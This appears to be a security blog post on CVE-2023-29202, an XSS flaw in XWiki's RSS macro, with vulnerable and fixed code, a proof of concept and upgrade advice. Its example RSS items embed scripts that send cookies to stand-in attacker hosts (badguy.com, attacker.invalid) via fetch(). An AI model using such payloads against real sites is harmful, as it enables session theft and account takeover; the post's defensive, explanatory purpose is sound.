A critical security vulnerability—CVE-2023-29202—was discovered in XWiki Commons, affecting the bundled RSS macro. Attackers could inject malicious HTML and JavaScript content through crafted RSS feeds, leading to cross-site scripting (XSS) attacks. In worst-case scenarios, if exploited by a user with programming rights, this flaw could escalate to remote code execution, information theft, and even full sabotage of your wiki.
This in-depth post explains what CVE-2023-29202 is, how the exploit works, code snippets showing the vulnerability, ways attackers can abuse it, and how to stay safe—with exclusive, easy-to-understand explanations.
What is XWiki Commons and the RSS Macro?
XWiki is a popular open-source wiki platform. The XWiki Commons package includes shared libraries, and the RSS macro lets users embed RSS feed content directly into wiki pages. You use it like this:
```
{{rss feed="https://somefeed.com/rss" content="true"/}}
```
Setting `content="true"` tells XWiki to display the full contents of RSS items, not just titles or descriptions.
The Vulnerability Explained
In affected XWiki versions, when content is set to true, the RSS macro injects the _raw_ feed content into the HTML output without sanitizing it.
If someone points the RSS macro to a malicious feed containing <script> tags, arbitrary JavaScript runs as soon as a user views the page. This is classic XSS—except potentially more dangerous in XWiki, as users with “programming rights” can trigger scripts with powerful permissions.
Here’s a simplified look at what went wrong (not exact XWiki source, but illustrative):
```java
// Hypothetical vulnerable snippet
String feedContent = fetchRSSContent(feedUrl);
if (displayContent) {
    // Oops! Directly inserts content, no HTML cleanup!
    wikiPageOutput.append(feedContent);
}
```
No call to a sanitizer such as Jsoup, nor any built-in cleaning mechanism, is made before the content is written to the page.
Suppose you’re an attacker who controls an RSS feed. You craft a malicious item like:
```xml
<item>
  <title>Evil Post</title>
  <description><![CDATA[
    <h1>You've been hacked!</h1>
    <script>
      // Steal cookies, send to attacker's server
      fetch('https://badguy.com/log?cookie='+encodeURIComponent(document.cookie));
    </script>
  ]]></description>
</item>
```
You then embed this feed into a wiki page with:
```
{{rss feed="https://evil.com/rss.xml" content="true"/}}
```
Anyone viewing the page—especially with higher privileges—would silently execute the JavaScript. Now, as XWiki is a rich collaborative platform, privileges could be abused for:
- Privilege escalation: scripts can issue wiki API requests that ride the victim’s authenticated session, granting the attacker higher access.
- Remote code execution: With programming rights, malicious scripts can execute powerful server-side actions.
A minimal proof of concept follows the same steps:
1. Malicious feed: publish an item titled "Attack!" whose description carries, inside a CDATA block, a script that runs `alert('XSS by CVE-2023-29202!')`.
2. Embed it in a wiki page:
```
{{rss feed="https://malicious.example/rss.xml" content="true"/}}
```
3. Visit the page.
Any user who visits will trigger the alert, and a real attacker could swap the alert for malicious JavaScript that steals session cookies or performs wiki actions using the victim’s credentials.
Security Impact
Severity: high/critical, especially if programming rights are involved.
Impact: information disclosure, data loss, and sabotage.
Affected versions: all XWiki versions before 14.6 RC1 with the RSS macro enabled.
The Fix
The vulnerability is patched in XWiki 14.6 RC1 and newer. Now, feed contents are properly cleaned to strip out scripts and dangerous HTML.
From the official advisory:
> “The content of the feed is now properly cleaned before being displayed.”
Sanitization Example (conceptual)
```java
// Hypothetical fixed snippet
String safeContent = htmlSanitizer.clean(feedContent);
// Only append safe HTML to the page now!
wikiPageOutput.append(safeContent);
```
To see which version of the macro your instance ships, check the jar name under WEB-INF/lib:
```
WEB-INF/lib/xwiki-platform-rendering-macro-rss-XX.jar
```
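To make the contrast between the vulnerable snippet and the conceptual fix concrete, here is an added, runnable Python illustration (not XWiki’s own code, which is Java and uses its own HTML cleaner). It parses a constructed feed carrying the malicious item shown earlier, renders it raw as the old macro did, and renders it through a small allow-list sanitizer as the fix does; the tag and attribute allow-lists and the feed contents are assumptions.

```python
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed feed (not a real one), mirroring the malicious item shown above.
MALICIOUS_FEED = """<rss version="2.0"><channel><title>Evil</title>
<item><title>Evil Post</title><description><![CDATA[
<h1>You've been hacked!</h1>
<p>Read <a href="javascript:alert(1)" onclick="alert(2)">this</a>.</p>
<script>fetch('https://attacker.invalid/log?c=' + document.cookie);</script>
]]></description></item></channel></rss>"""

# Assumed allow-lists; a real cleaner would be far more complete.
ALLOWED_TAGS = {"p", "h1", "h2", "h3", "a", "ul", "ol", "li", "em", "strong", "br"}
ALLOWED_ATTRS = {"a": {"href"}}   # every other attribute (onclick, style, ...) is dropped

class Sanitizer(HTMLParser):
    """Allow-list cleaner: unknown tags vanish, <script>/<style> bodies are dropped."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = "".join(f' {n}="{html.escape(v, quote=True)}"' for n, v in attrs
                           if n in ALLOWED_ATTRS.get(tag, ()) and v
                           and v.strip().lower().startswith(("http://", "https://", "/")))
            self.out.append(f"<{tag}{kept}>")
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:   # re-escape text so it can never open a tag of its own
            self.out.append(html.escape(data, quote=False))

def sanitize_html(fragment):
    s = Sanitizer(); s.feed(fragment); s.close()
    return "".join(s.out)

def item_descriptions(feed_xml):
    return [(i.findtext("title", ""), i.findtext("description", "")) for i in ET.fromstring(feed_xml).iter("item")]

def render_vulnerable(feed_xml):
    # Pre-14.6 RC1 behaviour: the description is appended to the page untouched.
    return "".join(f"<h2>{t}</h2>{d}" for t, d in item_descriptions(feed_xml))

def render_fixed(feed_xml):
    # Fixed behaviour: title escaped, description passed through the cleaner first.
    return "".join(f"<h2>{html.escape(t)}</h2>{sanitize_html(d)}" for t, d in item_descriptions(feed_xml))
```

Running both renderers over the same feed shows the raw output still containing the `<script>` and the cookie read, while the cleaned output keeps only the heading, paragraph and a link stripped of its `javascript:` URL and `onclick` handler.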
References and More Reading
- Official XWiki Security Advisory
- NVD entry for CVE-2023-29202
- XWiki RSS Macro Documentation
- OWASP Cross-site Scripting (XSS) Guide
Conclusion
CVE-2023-29202 is a severe XSS vulnerability in XWiki’s RSS macro before 14.6 RC1, where raw feed content could inject malicious HTML or JavaScript. With XWiki’s powerful permission system, exploiting this can have dire consequences, from simple defacement to complete system takeover.
Upgrade your XWiki now to 14.6 RC1 or later. If you cannot upgrade, uninstall the RSS macro or limit programming rights. Don’t let your wiki be the next victim of this critical flaw.
Stay safe, keep your software patched, and review third-party content!
Timeline
Published on: 04/15/2023 15:15:00 UTC
Last modified on: 04/25/2023 18:55:00 UTC